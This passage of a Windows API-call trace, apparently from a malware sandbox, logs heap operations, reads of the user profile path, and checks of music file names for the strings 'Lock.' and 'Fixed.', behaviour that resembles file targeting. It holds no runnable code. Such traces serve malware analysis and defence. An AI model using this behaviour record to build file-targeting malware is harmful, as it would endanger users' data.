dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0208.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0208.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e) returned 0x2a5de40 [0208.025] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\pFAB.wav", lpFilePart=0x8cf650*="pFAB.wav") returned 0x1e [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0208.025] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\pFAB.wav" (normalized: "c:\\users\\fd1hvy\\music\\pfab.wav")) returned 0xffffffff [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.026] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0208.026] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.026] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0208.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGVUGdUF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GVUGdUF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VUGdUF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGdUF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GdUF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UF Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ft.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0208.027] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0208.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69b50 [0208.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGVUGdUF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GVUGdUF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VUGdUF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGdUF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GdUF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UF Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ft.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73648 [0208.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73648 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.029] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0208.029] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0208.029] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0208.030] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0208.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0208.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0208.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0208.031] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.031] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f30 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0208.032] RtlAllocateHeap 